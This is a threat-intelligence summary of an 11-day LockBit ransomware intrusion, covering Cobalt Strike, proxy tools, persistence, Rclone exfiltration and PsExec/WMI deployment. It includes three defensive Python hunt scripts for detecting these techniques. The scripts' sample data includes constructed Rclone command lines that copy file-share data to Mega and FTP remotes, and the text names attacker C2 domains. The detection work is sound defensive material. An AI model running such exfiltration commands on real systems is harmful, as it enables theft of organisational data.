A well-coordinated cyber intrusion, spanning 11 days, culminated in the deployment of LockBit ransomware across a corporate environment.
The attack, which began with the execution of a malicious file posing as a Windows Media Configuration Utility, displayed a sophisticated playbook leveraging Cobalt Strike, advanced persistence mechanisms, lateral movement, data exfiltration tools, and an eventual ransomware payload.
Cobalt Strike Deployment
The attack commenced in January 2024 with a targeted phishing lure.
The victim downloaded and executed a malicious file (setup_wm.exe) mimicking the Windows Media Configuration Utility.
This file acted as a loader for a Cobalt Strike beacon. Cobalt Strike is a commercial adversary-simulation framework widely abused by threat actors for post-exploitation, and the beacon established the initial command-and-control (C2) connection.
Within 30 minutes the attackers were running discovery commands to identify domain controllers, taking advantage of the elevated privileges held by the compromised user.
The attackers installed two proxy tools, SystemBC and GhostSOCKS, on the domain controller.
While GhostSOCKS was detected and blocked by Windows Defender, SystemBC remained operational, enabling continued command and control communications.
Sophisticated persistence techniques were observed throughout the intrusion.
Scheduled tasks were widely deployed to trigger malicious binaries like SystemBC and GhostSOCKS.
Additionally, registry-based run keys ensured the automatic execution of payloads on user login.
To evade detection, the adversaries manipulated group policies to disable Windows Defender protections and employed process injection techniques to blend malicious activities into legitimate processes such as WUAUCLT.exe.
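The scheduled-task, Run-key and Defender-policy changes described above all leave traces in Windows telemetry. The following hunt script is an added example, not code from the original article or from The DFIR Report: it walks a list of constructed event records modelled on Security Event 4698 (scheduled task created, which embeds the task definition XML) and Sysmon Event ID 13 (registry value set), and flags task actions or Run-key values that execute from user-writable directories as well as Group Policy-driven Defender settings being switched off. All host names, task names, paths and SIDs are invented.

```python
"""Hunt for the persistence and Defender-tampering techniques described above.

Added example, not code from the original article or The DFIR Report. Input is
a list of constructed Windows event records modelled on Security Event 4698
(scheduled task created, carrying the task definition XML) and Sysmon Event
ID 13 (registry value set). Host names, task names, paths and SIDs are invented.
"""
import re
import xml.etree.ElementTree as ET
from typing import Optional

# Directories a vendor installer rarely uses for a scheduled-task or Run-key
# payload; binaries launched from here deserve a second look.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\appdata\\|\\programdata\\|\\users\\public\\|\\temp\\",
    re.IGNORECASE,
)
RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run\\"
# Defender settings pushed through Group Policy land under this policy key.
DEFENDER_POLICY = "\\software\\policies\\microsoft\\windows defender\\"
DEFENDER_TAMPER_VALUES = {"disableantispyware", "disableantivirus", "disablerealtimemonitoring"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def task_commands(task_xml: str) -> list[str]:
    """Return '<command> <arguments>' for every Exec action in a 4698 task definition."""
    root = ET.fromstring(task_xml)
    cmds = []
    for action in root.iterfind(".//t:Actions/t:Exec", TASK_NS):
        cmd = action.findtext("t:Command", default="", namespaces=TASK_NS)
        args = action.findtext("t:Arguments", default="", namespaces=TASK_NS)
        cmds.append(f"{cmd} {args}".strip())
    return cmds


def dword_value(details: str) -> Optional[int]:
    """Parse Sysmon's 'DWORD (0x00000001)' rendering; None for non-DWORD data."""
    m = re.search(r"DWORD \(0x([0-9a-f]+)\)", details, re.IGNORECASE)
    return int(m.group(1), 16) if m else None


def analyze(events: list[dict]) -> list[dict]:
    """Return one finding per suspicious event, tagged with the technique it matches."""
    findings = []
    for ev in events:
        if ev["event_id"] == 4698:
            for cmd in task_commands(ev["task_content"]):
                if USER_WRITABLE.search(cmd):
                    findings.append({"host": ev["host"], "technique": "scheduled_task_persistence",
                                     "detail": f'{ev["task_name"]} -> {cmd}'})
        elif ev["event_id"] == 13:
            key = ev["target_object"].lower()
            value_name = key.rsplit("\\", 1)[-1]
            if RUN_KEY in key and USER_WRITABLE.search(ev["details"]):
                findings.append({"host": ev["host"], "technique": "run_key_persistence",
                                 "detail": f'{ev["target_object"]} = {ev["details"]}'})
            elif DEFENDER_POLICY in key and value_name in DEFENDER_TAMPER_VALUES \
                    and dword_value(ev["details"]) == 1:
                findings.append({"host": ev["host"], "technique": "defender_policy_tamper",
                                 "detail": ev["target_object"]})
    return findings


def make_task_xml(command: str, arguments: str) -> str:
    """Minimal task definition in the schema that Event 4698 embeds (constructed)."""
    return ('<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            '<Actions Context="Author"><Exec>'
            f"<Command>{command}</Command><Arguments>{arguments}</Arguments>"
            "</Exec></Actions></Task>")


SAMPLE_EVENTS = [  # constructed records, not telemetry from the reported intrusion
    {"host": "DC01", "event_id": 4698, "task_name": "\\Microsoft\\Windows\\Shell\\UpdateCheck",
     "task_content": make_task_xml("C:\\ProgramData\\svc\\socks.exe", "-q")},
    {"host": "DC01", "event_id": 4698, "task_name": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "task_content": make_task_xml("%windir%\\system32\\defrag.exe", "-c -h -k -g -$")},
    {"host": "WS042", "event_id": 13,
     "target_object": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "details": "C:\\Users\\jdoe\\AppData\\Roaming\\upd\\wm.exe"},
    {"host": "WS042", "event_id": 13,
     "target_object": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\VendorTray",
     "details": '"C:\\Program Files\\Vendor\\tray.exe" /minimized'},
    {"host": "FS01", "event_id": 13,
     "target_object": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware",
     "details": "DWORD (0x00000001)"},
    {"host": "FS01", "event_id": 13,
     "target_object": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring",
     "details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['technique']}] {f['host']}: {f['detail']}")
```

Of the six constructed records, the defrag task and the vendor tray Run key pass silently while the ProgramData task, the AppData Run key and both Defender policy values are reported. In production the path heuristic should be paired with a baseline of known task and Run-key entries, since legitimate software does occasionally autostart from ProgramData.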
The attackers demonstrated advanced lateral movement capabilities. Using Remote Desktop Protocol (RDP), Windows Remote Management (WinRM), and SMB, they spread across the network, deploying secondary payloads on file servers and backup servers.
Notably, they leveraged Rclone for data exfiltration. After initial attempts to push data to FTP servers failed, the adversaries pivoted to Mega.io, sustaining large-scale transfers over roughly 16 hours.
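Rclone is a legitimate sync tool, and attackers routinely rename the binary, so detecting it by file name alone is fragile. The following scorer is an added example, not code from the original article or from The DFIR Report: it inspects constructed process-creation command lines (Sysmon Event ID 1 or Security 4688 style) and combines three signals, the image name, an rclone verb used together with rclone's `name:path` or `:backend,param=value:path` remote syntax, and rclone-specific flags, so a renamed copy headed for a Mega or FTP remote still scores above threshold while `robocopy`, the `copy` shell builtin and `git clone` do not. Host names, users, paths and the 203.0.113.x address are invented.

```python
"""Flag Rclone-style bulk copies to remote storage in process-creation telemetry.

Added example, not code from the original article or The DFIR Report. It scores
constructed command lines (Sysmon Event ID 1 / Security 4688 style) so that a
renamed rclone binary is still caught by its verb, remote syntax and flags.
Host names, users, paths and the 203.0.113.x address are invented.
"""
import re

# Flags characteristic of rclone and rare in other copy tools.
RCLONE_FLAGS = {
    "--config", "--transfers", "--ignore-existing", "--multi-thread-streams",
    "--no-check-certificate", "--progress", "-P", "--bwlimit", "--max-age",
    "--auto-confirm", "--checkers",
}
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "lsd", "lsf"}
# An rclone remote is 'name:path' (name of 2+ chars, so C:\... is excluded) or an
# on-the-fly backend ':backend,param=value,...:path'; URLs ('https://') are excluded.
REMOTE = re.compile(r"^(?::[a-z0-9]+(?:,[^:\s]+)?|[a-z][a-z0-9_-]+):(?!//)", re.IGNORECASE)
TOKEN = re.compile(r'"[^"]*"|\S+')


def tokens(cmdline: str) -> list[str]:
    """Split a Windows command line, keeping quoted paths together and dropping the quotes."""
    return [t.strip('"') for t in TOKEN.findall(cmdline)]


def backend(remote: str) -> str:
    """Best-effort label of the storage behind a remote token (for triage, not a verdict)."""
    low = remote.lower()
    if low.startswith(":"):                       # ':ftp,host=...:/path' -> 'ftp'
        return low[1:].split(",", 1)[0].split(":", 1)[0]
    return low.split(":", 1)[0]                   # 'mega:exfil' -> 'mega'


def score_rclone(cmdline: str) -> dict:
    """Score one command line; higher means more rclone-like. Reasons explain the score."""
    toks = tokens(cmdline)
    if not toks:
        return {"score": 0, "reasons": [], "remotes": []}
    score, reasons = 0, []
    image = toks[0].rsplit("\\", 1)[-1].lower()
    if image == "rclone.exe":
        score += 2
        reasons.append("image is rclone.exe")
    remotes = [t for t in toks[1:] if REMOTE.match(t)]
    verbs = [t for t in toks[1:] if t.lower() in RCLONE_VERBS]
    if remotes and verbs:                         # a copy verb plus a real remote target
        score += 2
        reasons.append(f"{verbs[0]} to remote backend '{backend(remotes[0])}'")
    flags = sorted({t.split("=", 1)[0] for t in toks[1:]} & RCLONE_FLAGS)
    if flags:
        score += min(len(flags), 3)
        reasons.append("rclone flags " + " ".join(flags))
    return {"score": score, "reasons": reasons, "remotes": remotes}


def hunt(events: list[dict], threshold: int = 3) -> list[dict]:
    """Return an alert for every process-creation event scoring at or above threshold."""
    alerts = []
    for ev in events:
        verdict = score_rclone(ev["command_line"])
        if verdict["score"] >= threshold:
            alerts.append({"host": ev["host"], "user": ev["user"], "score": verdict["score"],
                           "remotes": verdict["remotes"], "reasons": verdict["reasons"]})
    return alerts


SAMPLE_EVENTS = [  # constructed records, not telemetry from the reported intrusion
    {"host": "FS01", "user": "CORP\\svc-backup",
     "command_line": r'"C:\ProgramData\rc\rclone.exe" copy "\\FS01\Finance" mega:exfil --transfers 10 --ignore-existing -P'},
    {"host": "BK01", "user": "CORP\\svc-backup",   # renamed binary, on-the-fly FTP backend
     "command_line": r"C:\ProgramData\svc\svchost.exe copy D:\Shares\HR :ftp,host=203.0.113.10,user=x,pass=y:/in --transfers 8 --config C:\ProgramData\svc\r.conf"},
    {"host": "WS042", "user": "CORP\\jdoe", "command_line": r"robocopy.exe D:\Data E:\Backup /MIR /R:3"},
    {"host": "WS042", "user": "CORP\\jdoe", "command_line": r"cmd.exe /c copy C:\a.txt D:\b.txt"},
    {"host": "DEV01", "user": "CORP\\dev", "command_line": r"git.exe clone https://example.com/repo.git"},
    {"host": "DEV01", "user": "CORP\\dev", "command_line": r"rclone.exe version"},
]

if __name__ == "__main__":
    for a in hunt(SAMPLE_EVENTS):
        print(f"{a['host']} {a['user']} score={a['score']} remotes={a['remotes']} :: {'; '.join(a['reasons'])}")
```

The two exfiltration-style command lines score 7 and 4; `rclone.exe version` scores 2 and stays below the threshold, and the three non-rclone copies score 0. Pairing the process signal with network telemetry for the same host (large outbound volume to Mega or to an external FTP server within the same window) turns a medium-confidence hunt into a high-confidence alert.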
The attackers also accessed sensitive documents containing stored credentials and executed scripts like Veeam-Get-Creds.ps1 to extract backup software passwords.
They employed reconnaissance tools such as Seatbelt and SharpView to map the Active Directory environment and identify high-value targets.
LockBit Ransomware Deployment
After a 15-hour operational lull, the attackers shifted focus to their objective—ransomware deployment.
On the eleventh day, they staged the LockBit ransomware binary on a backup server and executed batch scripts to propagate the payload across all networked Windows hosts.
Tools like PsExec and WMI were used to distribute and execute the ransomware, while additional scripts disabled security mechanisms such as Windows Defender.
According to The DFIR Report, the deployment achieved complete encryption of targeted hosts within two hours.
Affected systems displayed a ransom note from LockBit, instructing victims to initiate negotiations.
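The hallmark of the deployment phase described above is fan-out: one operator pushing a payload to every reachable host with PsExec and WMI inside a short window. The following detector is an added example, not code from the original article or from The DFIR Report: it consumes constructed Sysmon Event ID 1 (process creation) records gathered from a fleet, treats PsExec's service binary (PSEXESVC.exe) and any process whose parent is WmiPrvSE.exe as remote execution, and raises one alert per burst in which such activity touches at least MIN_HOSTS distinct hosts within a sliding 10-minute window. Host names and timestamps are invented; the two-hour encryption figure from the report is not modelled.

```python
"""Detect ransomware-style fan-out: a burst of remote execution across many hosts.

Added example, not code from the original article or The DFIR Report. It reads
constructed Sysmon Event ID 1 (process creation) records collected from a fleet
and alerts when PsExec's service binary (PSEXESVC.exe) or WMI-spawned processes
(parent WmiPrvSE.exe) appear on at least MIN_HOSTS distinct hosts inside one
sliding window. Host names and timestamps are invented.
"""
from collections import Counter
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
MIN_HOSTS = 5
REMOTE_EXEC_IMAGES = {"psexesvc.exe"}     # PsExec drops and starts this service binary
REMOTE_EXEC_PARENTS = {"wmiprvse.exe"}    # processes created via Win32_Process.Create


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_remote_exec(ev: dict) -> bool:
    """True when the process looks like it was started remotely via PsExec or WMI."""
    return (basename(ev["image"]) in REMOTE_EXEC_IMAGES
            or basename(ev["parent_image"]) in REMOTE_EXEC_PARENTS)


def parse_utc(ts: str) -> datetime:
    """Sysmon UtcTime looks like '2024-01-12 02:10:13.137'."""
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f")


def fanout_alerts(events: list[dict], window: timedelta = WINDOW, min_hosts: int = MIN_HOSTS) -> list[dict]:
    """Sliding-window count of distinct hosts with remote-exec activity; one alert per burst."""
    hits = sorted((parse_utc(e["utc_time"]), e["host"], basename(e["image"]))
                  for e in events if is_remote_exec(e))
    alerts, live, left, current = [], Counter(), 0, None
    for i, (t, host, _image) in enumerate(hits):
        live[host] += 1
        while t - hits[left][0] > window:         # expire hits that fell out of the window
            old_host = hits[left][1]
            live[old_host] -= 1
            if live[old_host] == 0:
                del live[old_host]
            left += 1
        if len(live) >= min_hosts:
            window_images = {h[2] for h in hits[left:i + 1]}
            if current is None:                    # first crossing opens a new burst
                current = {"start": hits[left][0], "end": t, "hosts": set(live), "images": window_images}
                alerts.append(current)
            else:                                  # extend the open burst
                current["end"] = t
                current["hosts"] |= set(live)
                current["images"] |= window_images
        else:
            current = None
    return alerts


def ev(host: str, utc_time: str, image: str, parent_image: str) -> dict:
    return {"host": host, "utc_time": utc_time, "image": image, "parent_image": parent_image}


WMI = "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"
SVCS = "C:\\Windows\\System32\\services.exe"
SAMPLE_EVENTS = [  # constructed fleet telemetry, not from the reported intrusion
    ev("WS010", "2024-01-11 09:00:02.410", "C:\\Windows\\System32\\cscript.exe", WMI),   # lone inventory job
    ev("WS010", "2024-01-11 09:00:02.900", "C:\\Windows\\System32\\notepad.exe", "C:\\Windows\\explorer.exe"),
    ev("WS011", "2024-01-12 02:10:13.137", "C:\\Windows\\PSEXESVC.exe", SVCS),
    ev("WS012", "2024-01-12 02:10:14.002", "C:\\Windows\\PSEXESVC.exe", SVCS),
    ev("FS01", "2024-01-12 02:10:15.511", "C:\\Windows\\PSEXESVC.exe", SVCS),
    ev("WS020", "2024-01-12 02:11:40.080", "C:\\Windows\\System32\\cmd.exe", WMI),
    ev("WS021", "2024-01-12 02:11:41.300", "C:\\Windows\\System32\\cmd.exe", WMI),
    ev("WS022", "2024-01-12 02:12:03.775", "C:\\Windows\\System32\\cmd.exe", WMI),
    ev("DC01", "2024-01-12 02:13:30.001", "C:\\Windows\\PSEXESVC.exe", SVCS),
    ev("BK01", "2024-01-12 02:14:09.620", "C:\\Windows\\PSEXESVC.exe", SVCS),
    ev("WS030", "2024-01-12 02:40:00.000", "C:\\Windows\\PSEXESVC.exe", SVCS),         # isolated, no burst
]

if __name__ == "__main__":
    for a in fanout_alerts(SAMPLE_EVENTS):
        print(f"{a['start']} .. {a['end']}: {len(a['hosts'])} hosts via {sorted(a['images'])}")
```

The constructed data yields a single alert covering eight hosts between 02:10 and 02:14; the single WMI-spawned inventory script the day before and the lone PsExec run at 02:40 never reach the threshold. Endpoint-management products also create processes through WmiPrvSE.exe, so in a real estate the parent filter should exclude known management accounts or images and the threshold should come from the environment's own baseline.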
This operation highlights the evolving sophistication of ransomware campaigns, where attackers integrate data exfiltration with ransomware deployment, amplifying the pressure on victims.
Key indicators of compromise (IoCs) in this intrusion include:
- C2 Domains: compdatasystems.com, retailadvertisingservices.com
- Proxy Tools: SystemBC and GhostSOCKS binaries
- Data Exfiltration Tools: Rclone targeting Mega.io and FTP servers
The coordinated use of Cobalt Strike, persistence mechanisms, and advanced lateral movement tactics underscores the necessity of layered cybersecurity defenses.
Organizations are advised to implement active monitoring of scheduled tasks, registry changes, and network traffic, alongside regular patching and incident response simulations to mitigate such high-impact incidents.